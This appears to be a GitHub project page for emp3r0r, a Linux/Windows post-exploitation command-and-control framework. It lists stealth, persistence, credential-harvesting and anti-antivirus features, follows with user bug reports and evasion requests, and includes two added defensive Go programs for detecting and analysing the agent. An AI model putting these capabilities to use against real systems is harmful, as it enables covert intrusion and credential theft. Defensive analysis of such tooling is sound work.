
emp3r0r's Introduction

emp3r0r

A post-exploitation framework for Linux/Windows

Status

  • emp3r0r C2 (Linux/Windows) is ready for testing. Please report bugs if you find any.
  • Read the wiki to get started
  • Download from here
  • Write modules for emp3r0r in your favorite languages
  • SSH harvester is ready for use
  • Windows support is ready, with a fully interactive shell
[Demo video ssh-harvester.mp4 and C2 screenshots omitted; see the project's "MORE screenshots" link]


Motivation

Initially, emp3r0r was developed as one of my weaponizing experiments. It was a learning process for me, trying to implement common Linux adversary techniques along with some of my own ideas.

So, what makes emp3r0r different? First of all, it is the first C2 framework that targets the Linux platform, including the capability of using any other tools through it. Take a look at the features for more reasons to use it.

To support third-party modules, emp3r0r has complete Python 3 support, included in the vaccine module (15 MB in total) together with necessary third-party packages such as Impacket, Requests and MySQL.


Features

  • Beautiful Terminal UI
    • Use tmux for window management
  • Stealth
    • Automatically changes argv so you won't notice it in ps listing
    • Hide files and PIDs via Glibc hijacking (patcher in get_persistence)
    • Built-in Elvish Shell with the same disguise as main process
    • All C2 communications are made over HTTP/2 with TLS
    • Defeat JA3 fingerprinting with UTLS
    • Painlessly encapsulated in Shadowsocks and KCP
    • Able to encapsulate in any external proxies such as TOR and CDNs
    • C2 relaying via SSH
    • DLL agent
  • Multi-Tasking
    • No need to wait for any command to finish
  • Module Support
  • Perfect Shell Experience via SSH with PTY support
    • Compatible with any SSH client and available for Windows
  • Bettercap
  • Auto persistence via various methods
  • Post-exploitation Tools
    • Nmap, Socat, Ncat, Bettercap, etc.
  • Credential Harvesting
  • Process Injection
  • Shellcode Injection
  • ELF Patcher for persistence
  • Packer
    • Encrypts and compresses agent binary and runs agent in a covert way
  • Hide processes and files and get persistence via shared library injection
  • Networking
    • Port Mapping
      • From C2 side to agent side, and vice versa
      • TCP/UDP both supported
    • Agent Side Socks5 Proxy with UDP support
  • Auto Root
  • LPE Suggest
  • System Info Collect
  • File Management
  • Log Cleaner
  • Screenshot
  • Anti-Antivirus
  • Internet Access Checker
  • Automatically bridge agents from internal networks to C2
    • For semi-isolated networks
  • Proxy via agent to agent SSH connection
  • Interoperability with Metasploit/Cobalt Strike
  • and many more :)
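
The "Stealth" entry above says the agent rewrites its argv so it is not noticed in a ps listing. From the detection side, that rewrite leaves a gap that can be checked: /proc/<pid>/cmdline carries the borrowed name, while /proc/<pid>/exe still points at the binary actually running. The following Go program is an added example and is not emp3r0r's code; the type and function names are assumptions, and the sample cmdline/exe pairs in its test are constructed.

```go
// Added example, not emp3r0r's own code: a triage check for the argv
// rewriting described under "Stealth" above. A process that rewrites its
// argv shows a borrowed name in `ps`, but /proc/<pid>/exe still points at the
// binary that is actually running, so the two can be compared. Legitimate
// daemons rewrite argv too (sshd shows "sshd: alice [priv]"), so a hit is a
// lead for an analyst, not proof of compromise.
package main

import (
	"bytes"
	"fmt"
	"os"
	"path"
	"strconv"
	"strings"
)

// ArgvFinding is one process whose displayed name does not match its binary.
type ArgvFinding struct {
	PID     int
	Shown   string // argv[0] as `ps` would display it
	ExePath string // what /proc/<pid>/exe resolves to
}

// argvMismatch is the pure comparison. cmdline is the raw NUL-separated
// content of /proc/<pid>/cmdline; exe is the readlink result of /proc/<pid>/exe.
// It returns the displayed name and true when that name does not start with
// the basename of the real executable. An empty cmdline (kernel threads,
// zombies) carries no argv and is never reported.
func argvMismatch(cmdline []byte, exe string) (string, bool) {
	if len(cmdline) == 0 {
		return "", false
	}
	argv0 := string(bytes.SplitN(cmdline, []byte{0}, 2)[0])
	// A path-like argv[0] is shortened to its basename; a free-form title such
	// as "[kworker/0:1]" or "sshd: alice [priv]" is kept whole, as ps shows it.
	shown := argv0
	if strings.HasPrefix(argv0, "/") {
		shown = path.Base(argv0)
	}
	// The link target gains a " (deleted)" suffix when the binary was unlinked
	// after exec; keep that in the finding but not in the comparison.
	exeName := path.Base(strings.TrimSuffix(exe, " (deleted)"))
	if strings.HasPrefix(shown, exeName) {
		return shown, false
	}
	return shown, true
}

// scanProc applies argvMismatch to every numeric entry under procRoot
// (normally "/proc"). Entries that cannot be read, typically other users'
// processes when not running as root, are skipped rather than reported.
func scanProc(procRoot string) ([]ArgvFinding, error) {
	entries, err := os.ReadDir(procRoot)
	if err != nil {
		return nil, err
	}
	var findings []ArgvFinding
	for _, e := range entries {
		pid, err := strconv.Atoi(e.Name())
		if err != nil || !e.IsDir() {
			continue
		}
		dir := procRoot + "/" + e.Name()
		cmdline, err := os.ReadFile(dir + "/cmdline")
		if err != nil {
			continue
		}
		exe, err := os.Readlink(dir + "/exe")
		if err != nil {
			continue
		}
		if shown, bad := argvMismatch(cmdline, exe); bad {
			findings = append(findings, ArgvFinding{PID: pid, Shown: shown, ExePath: exe})
		}
	}
	return findings, nil
}

func main() {
	findings, err := scanProc("/proc")
	if err != nil {
		fmt.Println("scan failed:", err)
		return
	}
	for _, f := range findings {
		fmt.Printf("pid %d shows %q but runs %s\n", f.PID, f.Shown, f.ExePath)
	}
}
```

Run it as root to cover every process; unprivileged runs only see the caller's own processes. Expect some benign hits, for example interpreters started through a symlink (sh resolving to dash or bash), which is why the result is a list to review rather than an alert on its own. A " (deleted)" exe target combined with a borrowed name is the pairing that deserves the first look.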

emp3r0r's People

Contributors

adolfsgrandson, dependabot[bot], github-actions[bot], hellojukay, inspiringz, jm33-m0, procommiter, sausagenoods, taigrr


emp3r0r's Issues

Need Custom Agent Tag

Need Custom Agent Tag Or Add Custom Agent Label

Because once the number of agents exceeds a certain count, they become difficult to identify.

Good Job

Tmux

You know how it is.
Also note: I did reinstall and retry; your update still isn't working though.

Network Scanning Idea

Hopefully this could save you development time, if not don't worry about this idea.

In your future releases list you have network scanning. Instead of building and maintaining a scanner,
you could use bettercap, as it can do active and passive scanning as well as other things.

You could drop the binary to memory and get it to do all the work and manage it via commands.

AttributeError: 'GoBuild' object has no attribute 'AgentRoot'

./build.py cc
Clean everything and start over? [Y/n] y
CC server address (domain name or ip address, can be more than one, separate with space):

127.0.0.1
[!] Exception:
Traceback (most recent call last):
  File "/home/kali/Downloads/emp3r0r-1.1.2/core/./build.py", line 709, in <module>
    main(sys.argv[1])
  File "/home/kali/Downloads/emp3r0r-1.1.2/core/./build.py", line 479, in main
    gobuild = GoBuild(target="cc", cc_ip=ccip, cc_other_names=cc_other)
  File "/home/kali/Downloads/emp3r0r-1.1.2/core/./build.py", line 110, in __init__
    CACHED_CONF['agent_root'] = self.AgentRoot
AttributeError: 'GoBuild' object has no attribute 'AgentRoot'

Proxy: panic: Write called after Handler finished

_, err = io.Copy(sh.H2x.Conn, conn)

emp3r0r @ubuntu\ubuntu_1179 (run_proxy) > panic: Write called after Handler finished

goroutine 4009 [running]:
net/http.(*http2responseWriter).write(0xc00047a048, 0x3, 0xc000366000, 0x3, 0x8000, 0x0, 0x0, 0x8, 0xc0004c4d40, 0x4b5c95)
        /usr/lib/go-1.13/src/net/http/h2_bundle.go:6233 +0x1fb
net/http.(*http2responseWriter).Write(0xc00047a048, 0xc000366000, 0x3, 0x8000, 0x503b4f, 0xc0005de180, 0xc000366000)
        /usr/lib/go-1.13/src/net/http/h2_bundle.go:6222 +0x56
github.com/posener/h2conn.(*flushWrite).Write(0xc000162240, 0xc000366000, 0x3, 0x8000, 0x50ff38, 0xc0005de180, 0xc000366000)
        /home/jm33/go/pkg/mod/github.com/posener/[email protected]/server.go:72 +0x55
github.com/posener/h2conn.(*Conn).Write(0xc0004ea500, 0xc000366000, 0x3, 0x8000, 0x0, 0x0, 0x0)
        /home/jm33/go/pkg/mod/github.com/posener/[email protected]/conn.go:35 +0xc7
io.copyBuffer(0x9acd20, 0xc0004ea500, 0x9acfc0, 0xc0004e8008, 0xc000366000, 0x8000, 0x8000, 0xc0004c4fa8, 0x64a91b, 0xcd3068)
        /usr/lib/go-1.13/src/io/io.go:404 +0x1fb
io.Copy(...)
        /usr/lib/go-1.13/src/io/io.go:364
github.com/jm33-m0/emp3r0r/core/lib/cc.(*PortFwdSession).RunPortFwd.func1.2(0xc0005dc1e0, 0xc0002446f0, 0x9bade0, 0xc0004e8008, 0xc0001920f0)
        /home/jm33/projects/emp3r0r/core/lib/cc/proxy.go:212 +0xdc
created by github.com/jm33-m0/emp3r0r/core/lib/cc.(*PortFwdSession).RunPortFwd.func1
        /home/jm33/projects/emp3r0r/core/lib/cc/proxy.go:210 +0x1d4

Windows agent: `interactive_shell` unusable

emp3r0r is written in golang, with multi-platform support as its special feature.
I'm very sorry to find that support was removed after tag 1.4.1

I hope to continue to support the Windows platform, thx.
Originally I wanted to submit a PR for agentw's interactive_shell,
but suddenly found there was no agentw directory.

Can I continue to submit code?
Mainly fixes the error of not being able to input with interactive_shell on windows.

Error building: missing go dependencies

This is what I get

I have go, tmux and everything needed to install but i don't understand why it won't build.


Go Version: go version go1.16.3 linux/amd64
Py Version: Python 3.8.5
OS Version: Ubuntu 20.04.2 LTS x86_64

Port-Fwd packet loss

Using ncat to test, the port mapping works okay: most messages get sent and received, but sometimes messages sent from CC are not displayed on the agent's side.

If we take the SSH port as an example, ssh doesn't even work, as it complains about a bad packet or something.

[FEATURE REQ] Reduce IOCs (Indicators of Compromise)

The tool is very easy to use and full-featured; thanks to the author for open-sourcing such a good tool. The only shortcoming I feel is that there are too many indicators of compromise: there are several sock files, and it also listens on several ports. It would be perfect if these could be streamlined and optimized.

Suggest:the windows version of the agent

I have tried to build, but there are bugs:

Use cached CC address (fuckyou.com)? [Y/n] 
Use cached CC indicator (https://fuckyou.com/status.txt)? [Y/n] 
Use cached 432 bytes of guardian shellcode (%temp%)? [Y/n] 
 Copy ./tls/emp3r0r-key.pem to ./build
 Copy ./tls/emp3r0r-cert.pem to ./build
GO BUILD starts...
# github.com/vishvananda/netns
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:27:13: undefined: syscall.Stat_t
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:28:12: undefined: syscall.Fstat
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:31:12: undefined: syscall.Fstat
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:39:8: undefined: syscall.Stat_t
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:43:12: undefined: syscall.Fstat
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:52:8: undefined: syscall.Stat_t
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:56:12: undefined: syscall.Fstat
/root/go/pkg/mod/github.com/vishvananda/[email protected]/netns.go:70:29: cannot use int(*ns) (type int) as type syscall.Handle in argument to syscall.Close
# github.com/zcalusic/sysinfo
/root/go/pkg/mod/github.com/zcalusic/[email protected]/kernel.go:24:12: undefined: syscall.Utsname
/root/go/pkg/mod/github.com/zcalusic/[email protected]/kernel.go:25:12: undefined: syscall.Uname
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:78:15: undefined: syscall.Mmap
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:78:56: undefined: syscall.PROT_READ
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:78:75: undefined: syscall.MAP_SHARED
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:82:9: undefined: syscall.Munmap
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:99:14: undefined: syscall.Mmap
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:99:58: undefined: syscall.PROT_READ
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:99:77: undefined: syscall.MAP_SHARED
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:103:8: undefined: syscall.Munmap
/root/go/pkg/mod/github.com/zcalusic/[email protected]/memory.go:103:8: too many errors
GO BUILD ends...
go build failed

build.py:
/dev/shm/.{rand_str(random.randint(3, 9))} ---> %temp%
Just a suggestion :)

Error while building Agent with Indicator URL (expected 'package', found https)

$ ./build.py agent
Use cached CC address (localhost)? [Y/n] n
Clean everything and start over? [Y/n] Y
 Deleted ./tls/emp3r0r-cert.pem
 Deleted ./tls/emp3r0r-key.pem
 Deleted ./tls/openssl-42c0be74-52ad-11eb-a236-3aad793bbfde.cnf
 Deleted ./build/agent
 Deleted ./build/build.json
 Deleted ./build/cc
 Deleted ./build/emp3r0r-cert.pem
 Deleted ./build/emp3r0r-key.pem
 Deleted ./build/emp3r0r.history
Traceback (most recent call last):
  File "./build.py", line 163, in clean
    os.remove(f)
IsADirectoryError: [Errno 21] Is a directory: './build/[agent_root]'
 Deleted ./tls/42c0be74-52ad-11eb-a236-3aad793bbfde-req.csr
CC server address (domain name or ip address): 127.0.0.1
Use cached CC indicator ()? [Y/n] n
CC status indicator: https://gist.githubusercontent.com/ID/raw/ID/gistfile1.txt
[!] Generating new certs...
>> creating serial
>> generating a keypair for: f02c3c48-52b0-11eb-a236-3aad793bbfde
.. key
Generating RSA private key, 2048 bit long modulus (2 primes)
...+++++
...+++++
e is 65537 (0x010001)
.. request
.. certificate
Signature ok
subject=CN = f02c3c48-52b0-11eb-a236-3aad793bbfde.com
Getting CA Private Key
.. removing key password
writing RSA key
<< f02c3c48-52b0-11eb-a236-3aad793bbfde keypair generated.
 Copy ./tls/emp3r0r-cert.pem to ./build
 Copy ./tls/emp3r0r-key.pem to ./build
GO BUILD starts...
../../internal/agent/def.go:1:1: expected 'package', found https <------------------
GO BUILD ends...
go build failed

Use the latest release

The master branch is being updated nightly, there's no guarantee that it will work.
If you want a stable version, download the ZIP from latest release.

build error

[*] Copying CC keypair to ./build
 Copy ./tls/emp3r0r-cert.pem to ./build
 Copy ./tls/emp3r0r-key.pem to ./build
GO BUILD starts...
# github.com/jm33-m0/emp3r0r/core/lib/cc
../../lib/cc/cmd.go:133:77: undefined: log.Lmsgprefix
GO BUILD ends...
go build failed


Error building

Just downloaded and used python3 build.py cc

Clean everything and start over? [Y/n] Y
CC server address (domain name or ip address, can be more than one, separate with space):
> XXXXXX.XXX
[!] Generating new certs...
>> generating a certificate authority
Generating RSA private key, 2048 bit long modulus (2 primes)
..+++++
...................................+++++
e is 65537 (0x010001)
req: Skipping unknown attribute "prompt"
<< certificate authority generated.
>> creating serial
>> generating a keypair for: 06ebf456-c6d7-11eb-b926-979f681e338f
.. key
Generating RSA private key, 2048 bit long modulus (2 primes)
............................+++++
........................................................+++++
e is 65537 (0x010001)
.. request
.. certificate
Signature ok
subject=CN = 06ebf456-c6d7-11eb-b926-979f681e338f.com
Getting CA Private Key
.. removing key password
writing RSA key
<< 06ebf456-c6d7-11eb-b926-979f681e338f keypair generated.
[!] Exception:
Traceback (most recent call last):
  File "build.py", line 656, in <module>
    main(sys.argv[1])
  File "build.py", line 429, in main
    gobuild.build()
  File "build.py", line 87, in build
    self.set_tags()
  File "build.py", line 293, in set_tags
    "DoHServer = \"\"", f"DoHServer = \"{CACHED_CONF['doh_server']}\"")
KeyError: 'doh_server'

am i missing something?

[BUG] emp3r0r wrapper

I am currently running Ubuntu 20.04.3 LTS.
This is what happens when I try to run emp3r0r.

no server running on /tmp/tmux-1000/default
[exited]

Port-Fwd: HTTP and SSH don't work

When using ncat to test, the port-mapping works okay, I can even run a reverse shell inside ncat connection.
Other services such as SSH and HTTP server, don't work at all.

2020/03/09 10:41:58 PortFwd started: -> 80 (08d91771-4eec-4ea0-85fa-f7090b2250f5)
2020/03/09 10:42:01 Read 0 bytes from port 80: EOF
2020/03/09 10:42:01 fwdToDport 80 exited

`interactive_shell` for Windows: incorrect terminal size

Overall the shell is working, and you should be able to use Tab and Ctrl in cmd and powershell sessions.

However, the terminal size seems wrong. As an example, when you issue cls to clear the screen, the on-screen text cannot be cleared correctly.

[Request] Drop More to Memory

Apologies if this is already the case, but can you please drop more files to memory instead of disk, and perhaps give the option to run commands directly in memory?

As an example, could the custom binaries used by the reverse shell and the output from the LPE suggest be stored in memory?

libemp3r0r's bug

There is a bug in libemp3r0r: when libemp3r0r is loaded, the file does not disappear, but its name becomes blank.


Fatal error: concurrent map writes

goroutine 2447 [chan send, 12 minutes]:
github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash.func2.1(0xc0001aeae0)
        lib/cc/rshell.go:53 +0x6d
github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash.func2(0xc0001aeae0, 0xc0002583a0, 0x981ac0, 0xc000107940)
        lib/cc/rshell.go:59 +0x228
created by github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash
        lib/cc/rshell.go:50 +0x165

goroutine 2446 [chan receive, 12 minutes]:
github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash.func1(0xc00006a6c0, 0xc0002583a0, 0x981ac0, 0xc000107940)
        lib/cc/rshell.go:34 +0x4d
created by github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash
        lib/cc/rshell.go:33 +0x114

goroutine 2465 [chan receive, 12 minutes]:
github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash.func4(0xc000201500, 0xc00000e0e8, 0xc0001aeae0, 0xc000266d70, 0x981ac0, 0xc000107940)
        lib/cc/rshell.go:135 +0x52
created by github.com/jm33-m0/emp3r0r/core/lib/cc.reverseBash
        lib/cc/rshell.go:134 +0x494

wait4 does not work

;; wait to clean up zombies

on success, returns the process ID of the child whose
state has changed; if WNOHANG was specified and one or more
child(ren) specified by pid exist, but have not yet changed
state, then 0 is returned. On error, -1 is returned.

And it returns 0 as I see in gdb

about hidden tcp connection and port and pid

I have been following this project of yours.
Right now the biggest weakness of Linux C2 agents is hiding IP connections, hiding processes, and hiding files; it is pretty much those three.
Otherwise, during post-exploitation a single command, netstat -untp, will reveal the suspicious process and connection; then the process gets killed, the trojan drops, and the access is gone.
Sorry to bring these up; it is just that your project is really excellent. I have followed you since FreeBuf until now.
It is just that I myself do not have very novel ideas for hiding (or hiding with the help of third-party tools, etc.). But I found that your project also has hiding features under development.
There is LKM and user-level hiding. I think hiding is a major pain point for all Linux remote-control tools, if this project can do it well. A certain earlier version of the emp3r0r agent seemed to open a local port, which is also easily noticed by ops staff.
Although this project is still excellent, the reason I am telling you this is that I hope it becomes even better; its features beat all Linux C2s. This is just my own shallow opinion.
Thank you for reading my submission.

Agent Daemon Error

[root@vultr shm]# ./emp3r0r -cdnproxy "wss://example.com/path/to/websocket/server" -daemon
emp3r0r agent has started
2021/03/07 14:23:33 Testing if agent is alive...
2021/03/07 14:23:33 Seems dead: dial unix /dev/shm/.246d895/.s6Y4tDtahIuL: connect: connection refused
2021/03/07 14:23:33 Failed to kill old emp3r0r os: process already finished
2021/03/07 14:23:33 /dev/shm/.246d895/.s6Y4tDtahIuL exists, testing connection...
2021/03/07 14:23:33 Testing if agent is alive...
2021/03/07 14:23:33 Seems dead: dial unix /dev/shm/.246d895/.s6Y4tDtahIuL: connect: connection refused

But
./emp3r0r -cdnproxy "wss://example.com/path/to/websocket/server"
this is ok

And by the way, how do I correctly use libemp3r0r?

build error

compile: version "go1.12.4" does not match go tool version "go1.15.6"
# internal/cpu
flag provided but not defined: -p
usage: asm [options] file.s ...
Flags:
  -D value
        predefined symbol with optional simple value -D=identifier=value; can be set multiple times
  -I value
        include directory; can be set multiple times
  -S    print assembly and machine code
  -V    print version and exit
  -debug
        dump instructions as they are parsed
  -dynlink
        support references to Go symbols defined in other shared libraries
  -e    no limit on number of errors reported
  -gensymabis
        write symbol ABI information to output file, don't assemble
  -o string
        output file; default foo.o for /a/b/c/foo.s as first argument
  -shared
        generate code that can be linked into a shared library
  -trimpath string
        remove prefix from recorded source file paths
# math/bits
compile: version "go1.12.4" does not match go tool version "go1.15.6"
# runtime/internal/atomic
flag provided but not defined: -p
usage: asm [options] file.s ...
Flags:
  -D value
        predefined symbol with optional simple value -D=identifier=value; can be set multiple times
  -I value
        include directory; can be set multiple times
  -S    print assembly and machine code
  -V    print version and exit
  -debug
        dump instructions as they are parsed
  -dynlink
        support references to Go symbols defined in other shared libraries
  -e    no limit on number of errors reported
  -gensymabis
        write symbol ABI information to output file, don't assemble
  -o string
        output file; default foo.o for /a/b/c/foo.s as first argument
  -shared
        generate code that can be linked into a shared library
  -trimpath string
        remove prefix from recorded source file paths
# runtime/internal/sys
compile: version "go1.12.4" does not match go tool version "go1.15.6"
# unicode/utf8
compile: version "go1.12.4" does not match go tool version "go1.15.6"
# internal/race
compile: version "go1.12.4" does not match go tool version "go1.15.6"
# sync/atomic
flag provided but not defined: -p
usage: asm [options] file.s ...
Flags:
  -D value
        predefined symbol with optional simple value -D=identifier=value; can be set multiple times
  -I value
        include directory; can be set multiple times
  -S    print assembly and machine code
  -V    print version and exit
  -debug
        dump instructions as they are parsed
  -dynlink
        support references to Go symbols defined in other shared libraries
  -e    no limit on number of errors reported
  -gensymabis
        write symbol ABI information to output file, don't assemble
  -o string
        output file; default foo.o for /a/b/c/foo.s as first argument
  -shared
        generate code that can be linked into a shared library
  -trimpath string
        remove prefix from recorded source file paths
# unicode

Trying to use go 1.12.4 gives the same error.
Thanks.

C2 handshake: timeout is `0`

OS:

Linux DM 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-3kali1 (2019-11-20) x86_64 GNU/Linux

Error message:

Target DM\root_c290e81fd-agent-abaf4d56-b118-f1f7-5a1b-e4039a0e81fd cannot be found, however, it left a message saying: [hellojVZyNRepkjSCXRbbweSPvVMeKMRllfuzNXJIuHEqBJfow]
2022/04/14 17:50:17 {hellojVZyNRepkjSCXRbbweSPvVMeKMRllfuzNXJIuHEqBJfow DM\root_c290e81fd-agent-abaf4d56-b118-f1f7-5a1b-e4039a0e81fd }: no agent found by this msg


I recompiled this program:

bash emp3r0r --build                       
/usr/bin/go
/data/go-workspace/go/bin/garble
[INFO] Remove temp history files.
[INFO] Building CC
# github.com/jm33-m0/emp3r0r/core/cmd/cc
HEADER = -H5 -T0x401000 -R0x1000
396423 symbols, 141457 reachable
	161575 package symbols, 150744 hashed symbols, 71502 non-package symbols, 12602 external symbols
569031 liveness data
[INFO] Building cat
# github.com/jm33-m0/emp3r0r/core/cmd/cat
HEADER = -H5 -T0x401000 -R0x1000
79132 symbols, 23634 reachable
	32443 package symbols, 31116 hashed symbols, 13233 non-package symbols, 2340 external symbols
90305 liveness data
[INFO] Building agent stub
# github.com/jm33-m0/emp3r0r/core/cmd/agent
HEADER = -H5 -T0x401000 -R0x1000
346445 symbols, 123695 reachable
	126804 package symbols, 148280 hashed symbols, 63649 non-package symbols, 7712 external symbols
567574 liveness data
[INFO] Building agent stub for Windows
# github.com/jm33-m0/emp3r0r/core/cmd/agent
HEADER = -H10 -T0xffffffffffffffff -R0xffffffff
327570 symbols, 116184 reachable
	119684 package symbols, 140536 hashed symbols, 60213 non-package symbols, 7137 external symbols
606672 liveness data
[INFO] Building Packer stub
# github.com/jm33-m0/emp3r0r/core/cmd/packer_stub
HEADER = -H5 -T0x401000 -R0x1000
304475 symbols, 62703 reachable
	111023 package symbols, 132853 hashed symbols, 55762 non-package symbols, 4837 external symbols
260346 liveness data

Read runtime config: should read directly from memory

Now emp3r0r agent reads its config info by parsing os.Args[0], which works in most cases. However, sometimes os.Args[0] is not guaranteed to be the (unmodified) agent binary itself, instead, it can be the executable file of injected process, or some packed agent binary.

jsonBegining := bytes.LastIndex(wholeStub, []byte(emp3r0r_data.MagicString))

To address this issue, it's better that we read config data from somewhere reliable, for example, we can wrap the data with our MagicString, and append it to stub.exe. When reading the config, we read /proc/self/mem and search for the magic string, split and extract our config data.
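
The issue above proposes wrapping the config in MagicString and appending it to the stub, then locating it with a last-index search. The Go program below is an added example and not emp3r0r's code: it implements that lookup over a byte blob and decodes the result, so it also serves the defender's side, where an analyst wants the configuration out of a captured sample without running it. The marker value, the "marker + JSON + marker" layout, the AgentConfig field names and the sample bytes are all assumptions constructed for this example; it reads a file (or /proc/self/exe) rather than /proc/self/mem.

```go
// Added example, not emp3r0r's own code: parsing a configuration blob that a
// stub carries after its last MagicString marker, the layout the issue above
// proposes. From the defender's side the same parsing recovers the
// configuration from a captured sample without running it. The marker value,
// the "marker + JSON + marker" layout and the field names are assumptions.
package main

import (
	"bytes"
	"encoding/json"
	"errors"
	"fmt"
	"os"
)

// magic is a placeholder marker; emp3r0r's real emp3r0r_data.MagicString is not reproduced here.
var magic = []byte("EXAMPLE-MAGIC-MARKER")

var errNoConfig = errors.New("no embedded config found")

// AgentConfig holds the fields this example expects in the embedded JSON (assumed names).
type AgentConfig struct {
	CCAddress   string `json:"cc_address"`
	CCIndicator string `json:"cc_indicator"`
	DoHServer   string `json:"doh_server"`
}

// extractEmbeddedConfig returns the bytes between the last pair of markers in
// blob. The search runs from the end (bytes.LastIndex) because the marker also
// exists as a string constant inside the program's own code section; scanning
// from the front would return that constant instead of the appended payload.
func extractEmbeddedConfig(blob, marker []byte) ([]byte, error) {
	end := bytes.LastIndex(blob, marker)
	if end <= 0 {
		return nil, errNoConfig
	}
	start := bytes.LastIndex(blob[:end], marker)
	if start < 0 {
		return nil, errNoConfig // only the code constant is present: nothing was appended
	}
	cfg := blob[start+len(marker) : end]
	if len(cfg) == 0 {
		return nil, errNoConfig
	}
	return cfg, nil
}

// parseEmbeddedConfig extracts and decodes the payload; a marker pair around
// bytes that are not JSON is reported as an error rather than silently used.
func parseEmbeddedConfig(blob, marker []byte) (*AgentConfig, error) {
	raw, err := extractEmbeddedConfig(blob, marker)
	if err != nil {
		return nil, err
	}
	var cfg AgentConfig
	if err := json.Unmarshal(raw, &cfg); err != nil {
		return nil, fmt.Errorf("embedded config is not valid JSON: %w", err)
	}
	return &cfg, nil
}

// parseConfigFile reads a file (a captured sample, or /proc/self/exe for a
// process inspecting its own image) and parses the embedded config.
func parseConfigFile(path string) (*AgentConfig, error) {
	blob, err := os.ReadFile(path)
	if err != nil {
		return nil, err
	}
	return parseEmbeddedConfig(blob, magic)
}

// sampleStub is constructed stand-in data for a compiled stub: it contains the
// marker once in its body, as the real binary's string constant would.
func sampleStub() []byte {
	var b bytes.Buffer
	b.WriteString("\x7fELF constructed code bytes ")
	b.Write(magic)
	b.WriteString(" more constructed code bytes ")
	return b.Bytes()
}

// sampleBlob is sampleStub with a constructed config appended as marker+JSON+marker.
func sampleBlob() []byte {
	var b bytes.Buffer
	b.Write(sampleStub())
	b.Write(magic)
	b.WriteString(`{"cc_address":"cc.example.com","cc_indicator":"https://cc.example.com/status.txt","doh_server":""}`)
	b.Write(magic)
	return b.Bytes()
}

func main() {
	cfg, err := parseEmbeddedConfig(sampleBlob(), magic)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("CC %s, indicator %s\n", cfg.CCAddress, cfg.CCIndicator)
	_, err = parseEmbeddedConfig(sampleStub(), magic)
	fmt.Println("stub without appended config:", err)
}
```

The last-index search is the part that matters for the failure mode described above: os.Args[0] may name an injected host process or a packed wrapper, and in both cases a front-to-back search would hit the marker constant in code rather than the trailing payload. On a sample with no appended config the function returns errNoConfig instead of handing back code bytes as if they were settings.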

emp3r0r/core/lib/agent/poll.go HTTPClient is nil

Running the agent directly, emp3r0r/core/lib/agent/poll.go:32 fails with panic: runtime error: invalid memory address or nil pointer dereference.
emp3r0r/core/lib/agent/def.go:29 can be changed to:

HTTPClient = &http.Client{
    Transport: &http.Transport{
        TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
    },
}

PortFwd: session dies after start

When mapping an agent-side address to CC, the portfwd session dies immediately after handshake, and port mapping becomes unusable.

Port-Fwd target service cannot handle multiple clients

There's still an issue:
Target TCP service on agent can't send its response to correct receiver when there're more than one clients connected. All clients can send anything to target service without issue, though.

CCIP parsing error

When using build.py, if only one IP is entered, the script fails to write correct IP address to build.json

Packer: dependencies missing

I am currently running Ubuntu 20.04.3 LTS, as well as Go version 1.16.1.
I was trying to run build.py.

go: github.com/mholt/[email protected]+incompatible: missing go.sum entry; to add it:
	go mod download github.com/mholt/archiver
run cryptor.exe
sh: 1: ./cryptor.exe: not found
[!] Exception:
Traceback (most recent call last):
  File "/usr/lib/python3.8/shutil.py", line 791, in move
    os.rename(src, real_dst)
FileNotFoundError: [Errno 2] No such file or directory: 'agent.packed.exe' -> '../core/./build/cc'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "./build.py", line 629, in <module>
    main(sys.argv[1])
  File "./build.py", line 400, in main
    gobuild.build()
  File "./build.py", line 162, in build
    shutil.move("agent.packed.exe", f"../core/{targetFile}")
  File "/usr/lib/python3.8/shutil.py", line 811, in move
    copy_function(src, real_dst)
  File "/usr/lib/python3.8/shutil.py", line 435, in copy2
    copyfile(src, dst, follow_symlinks=follow_symlinks)
  File "/usr/lib/python3.8/shutil.py", line 264, in copyfile
    with open(src, 'rb') as fsrc, open(dst, 'wb') as fdst:
FileNotFoundError: [Errno 2] No such file or directory: 'agent.packed.exe'

Error in atexit._run_exitfuncs:
Traceback (most recent call last):
  File "./build.py", line 503, in save
    readline.append_history_file(new_h_len - prev_h_len, hfile)
FileNotFoundError: [Errno 2] No such file or directory
